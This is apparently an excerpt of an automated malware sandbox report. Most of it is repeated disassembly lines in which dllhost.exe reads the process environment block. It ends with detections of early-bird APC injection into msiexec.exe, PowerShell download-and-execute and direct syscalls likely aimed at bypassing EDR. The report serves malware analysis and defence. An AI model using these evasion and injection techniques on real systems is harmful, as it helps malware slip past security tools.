Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382D090 mov eax, dword ptr fs:[00000030h] 11_2_0382D090
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03805096 mov eax, dword ptr fs:[00000030h] 11_2_03805096
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383909C mov eax, dword ptr fs:[00000030h] 11_2_0383909C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038980A8 mov eax, dword ptr fs:[00000030h] 11_2_038980A8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C60B8 mov eax, dword ptr fs:[00000030h] 11_2_038C60B8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C60B8 mov ecx, dword ptr fs:[00000030h] 11_2_038C60B8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h] 11_2_038170C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387D0C0 mov eax, dword ptr fs:[00000030h] 11_2_0387D0C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387D0C0 mov eax, dword ptr fs:[00000030h] 11_2_0387D0C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D50D9 mov eax, dword ptr fs:[00000030h] 11_2_038D50D9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038820DE mov eax, dword ptr fs:[00000030h] 11_2_038820DE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038290DB mov eax, dword ptr fs:[00000030h] 11_2_038290DB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FA020 mov eax, dword ptr fs:[00000030h] 11_2_037FA020
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FC020 mov eax, dword ptr fs:[00000030h] 11_2_037FC020
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038250E4 mov eax, dword ptr fs:[00000030h] 11_2_038250E4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038250E4 mov ecx, dword ptr fs:[00000030h] 11_2_038250E4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038860E0 mov eax, dword ptr fs:[00000030h] 11_2_038860E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038080E9 mov eax, dword ptr fs:[00000030h] 11_2_038080E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038420F0 mov ecx, dword ptr fs:[00000030h] 11_2_038420F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03884000 mov ecx, dword ptr fs:[00000030h] 11_2_03884000
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FC0F0 mov eax, dword ptr fs:[00000030h] 11_2_037FC0F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h] 11_2_0381E016
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h] 11_2_0381E016
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h] 11_2_0381E016
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h] 11_2_0381E016
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FA0E3 mov ecx, dword ptr fs:[00000030h] 11_2_037FA0E3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C903E mov eax, dword ptr fs:[00000030h] 11_2_038C903E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C903E mov eax, dword ptr fs:[00000030h] 11_2_038C903E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C903E mov eax, dword ptr fs:[00000030h] 11_2_038C903E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C903E mov eax, dword ptr fs:[00000030h] 11_2_038C903E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03896030 mov eax, dword ptr fs:[00000030h] 11_2_03896030
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03802050 mov eax, dword ptr fs:[00000030h] 11_2_03802050
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B052 mov eax, dword ptr fs:[00000030h] 11_2_0382B052
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038A705E mov ebx, dword ptr fs:[00000030h] 11_2_038A705E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038A705E mov eax, dword ptr fs:[00000030h] 11_2_038A705E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03886050 mov eax, dword ptr fs:[00000030h] 11_2_03886050
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388106E mov eax, dword ptr fs:[00000030h] 11_2_0388106E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D5060 mov eax, dword ptr fs:[00000030h] 11_2_038D5060
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov ecx, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811070 mov eax, dword ptr fs:[00000030h] 11_2_03811070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382C073 mov eax, dword ptr fs:[00000030h] 11_2_0382C073
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FD08D mov eax, dword ptr fs:[00000030h] 11_2_037FD08D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387D070 mov ecx, dword ptr fs:[00000030h] 11_2_0387D070
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF78A mov eax, dword ptr fs:[00000030h] 11_2_038BF78A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h] 11_2_037FB765
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h] 11_2_037FB765
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h] 11_2_037FB765
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h] 11_2_037FB765
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038897A9 mov eax, dword ptr fs:[00000030h] 11_2_038897A9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h] 11_2_0388F7AF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h] 11_2_0388F7AF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h] 11_2_0388F7AF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h] 11_2_0388F7AF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h] 11_2_0388F7AF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038007AF mov eax, dword ptr fs:[00000030h] 11_2_038007AF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382D7B0 mov eax, dword ptr fs:[00000030h] 11_2_0382D7B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D37B6 mov eax, dword ptr fs:[00000030h] 11_2_038D37B6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380C7C0 mov eax, dword ptr fs:[00000030h] 11_2_0380C7C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038057C0 mov eax, dword ptr fs:[00000030h] 11_2_038057C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038057C0 mov eax, dword ptr fs:[00000030h] 11_2_038057C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038057C0 mov eax, dword ptr fs:[00000030h] 11_2_038057C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038807C3 mov eax, dword ptr fs:[00000030h] 11_2_038807C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9730 mov eax, dword ptr fs:[00000030h] 11_2_037F9730
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9730 mov eax, dword ptr fs:[00000030h] 11_2_037F9730
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380D7E0 mov ecx, dword ptr fs:[00000030h] 11_2_0380D7E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388E7E1 mov eax, dword ptr fs:[00000030h] 11_2_0388E7E1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038227ED mov eax, dword ptr fs:[00000030h] 11_2_038227ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038227ED mov eax, dword ptr fs:[00000030h] 11_2_038227ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038227ED mov eax, dword ptr fs:[00000030h] 11_2_038227ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038047FB mov eax, dword ptr fs:[00000030h] 11_2_038047FB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038047FB mov eax, dword ptr fs:[00000030h] 11_2_038047FB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03805702 mov eax, dword ptr fs:[00000030h] 11_2_03805702
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03805702 mov eax, dword ptr fs:[00000030h] 11_2_03805702
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03807703 mov eax, dword ptr fs:[00000030h] 11_2_03807703
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383C700 mov eax, dword ptr fs:[00000030h] 11_2_0383C700
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03800710 mov eax, dword ptr fs:[00000030h] 11_2_03800710
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03830710 mov eax, dword ptr fs:[00000030h] 11_2_03830710
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383F71F mov eax, dword ptr fs:[00000030h] 11_2_0383F71F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383F71F mov eax, dword ptr fs:[00000030h] 11_2_0383F71F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03803720 mov eax, dword ptr fs:[00000030h] 11_2_03803720
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381F720 mov eax, dword ptr fs:[00000030h] 11_2_0381F720
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381F720 mov eax, dword ptr fs:[00000030h] 11_2_0381F720
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381F720 mov eax, dword ptr fs:[00000030h] 11_2_0381F720
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383C720 mov eax, dword ptr fs:[00000030h] 11_2_0383C720
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383C720 mov eax, dword ptr fs:[00000030h] 11_2_0383C720
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF72E mov eax, dword ptr fs:[00000030h] 11_2_038BF72E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C972B mov eax, dword ptr fs:[00000030h] 11_2_038C972B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h] 11_2_038DB73C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h] 11_2_038DB73C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h] 11_2_038DB73C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h] 11_2_038DB73C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387C730 mov eax, dword ptr fs:[00000030h] 11_2_0387C730
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03835734 mov eax, dword ptr fs:[00000030h] 11_2_03835734
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380973A mov eax, dword ptr fs:[00000030h] 11_2_0380973A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380973A mov eax, dword ptr fs:[00000030h] 11_2_0380973A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383273C mov eax, dword ptr fs:[00000030h] 11_2_0383273C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383273C mov ecx, dword ptr fs:[00000030h] 11_2_0383273C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383273C mov eax, dword ptr fs:[00000030h] 11_2_0383273C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03813740 mov eax, dword ptr fs:[00000030h] 11_2_03813740
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03813740 mov eax, dword ptr fs:[00000030h] 11_2_03813740
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03813740 mov eax, dword ptr fs:[00000030h] 11_2_03813740
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D3749 mov eax, dword ptr fs:[00000030h] 11_2_038D3749
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h] 11_2_037FF7BA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383674D mov esi, dword ptr fs:[00000030h] 11_2_0383674D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383674D mov eax, dword ptr fs:[00000030h] 11_2_0383674D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383674D mov eax, dword ptr fs:[00000030h] 11_2_0383674D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03800750 mov eax, dword ptr fs:[00000030h] 11_2_03800750
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842750 mov eax, dword ptr fs:[00000030h] 11_2_03842750
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03842750 mov eax, dword ptr fs:[00000030h] 11_2_03842750
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388E75D mov eax, dword ptr fs:[00000030h] 11_2_0388E75D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03884755 mov eax, dword ptr fs:[00000030h] 11_2_03884755
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03808770 mov eax, dword ptr fs:[00000030h] 11_2_03808770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810770 mov eax, dword ptr fs:[00000030h] 11_2_03810770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388368C mov eax, dword ptr fs:[00000030h] 11_2_0388368C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388368C mov eax, dword ptr fs:[00000030h] 11_2_0388368C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388368C mov eax, dword ptr fs:[00000030h] 11_2_0388368C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388368C mov eax, dword ptr fs:[00000030h] 11_2_0388368C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03804690 mov eax, dword ptr fs:[00000030h] 11_2_03804690
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03804690 mov eax, dword ptr fs:[00000030h] 11_2_03804690
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383C6A6 mov eax, dword ptr fs:[00000030h] 11_2_0383C6A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038366B0 mov eax, dword ptr fs:[00000030h] 11_2_038366B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h] 11_2_0380B6C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h] 11_2_0380B6C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h] 11_2_0380B6C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h] 11_2_0380B6C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h] 11_2_0380B6C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h] 11_2_0380B6C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h] 11_2_038C16CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h] 11_2_038C16CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h] 11_2_038C16CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h] 11_2_038C16CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383A6C7 mov ebx, dword ptr fs:[00000030h] 11_2_0383A6C7
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383A6C7 mov eax, dword ptr fs:[00000030h] 11_2_0383A6C7
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF6C7 mov eax, dword ptr fs:[00000030h] 11_2_038BF6C7
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038316CF mov eax, dword ptr fs:[00000030h] 11_2_038316CF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h] 11_2_037FF626
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382D6E0 mov eax, dword ptr fs:[00000030h] 11_2_0382D6E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382D6E0 mov eax, dword ptr fs:[00000030h] 11_2_0382D6E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038936EE mov eax, dword ptr fs:[00000030h] 11_2_038936EE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038936EE mov eax, dword ptr fs:[00000030h] 11_2_038936EE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038936EE mov eax, dword ptr fs:[00000030h] 11_2_038936EE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038936EE mov eax, dword ptr fs:[00000030h] 11_2_038936EE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038936EE mov eax, dword ptr fs:[00000030h] 11_2_038936EE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038936EE mov eax, dword ptr fs:[00000030h] 11_2_038936EE
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h] 11_2_0387E6F2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h] 11_2_0387E6F2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h] 11_2_0387E6F2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h] 11_2_0387E6F2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038806F1 mov eax, dword ptr fs:[00000030h] 11_2_038806F1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038806F1 mov eax, dword ptr fs:[00000030h] 11_2_038806F1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BD6F0 mov eax, dword ptr fs:[00000030h] 11_2_038BD6F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383F603 mov eax, dword ptr fs:[00000030h] 11_2_0383F603
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03831607 mov eax, dword ptr fs:[00000030h] 11_2_03831607
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381260B mov eax, dword ptr fs:[00000030h] 11_2_0381260B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381260B mov eax, dword ptr fs:[00000030h] 11_2_0381260B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381260B mov eax, dword ptr fs:[00000030h] 11_2_0381260B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381260B mov eax, dword ptr fs:[00000030h] 11_2_0381260B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381260B mov eax, dword ptr fs:[00000030h] 11_2_0381260B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381260B mov eax, dword ptr fs:[00000030h] 11_2_0381260B

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_6044.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtClose: Direct from: 0x76F02B6C
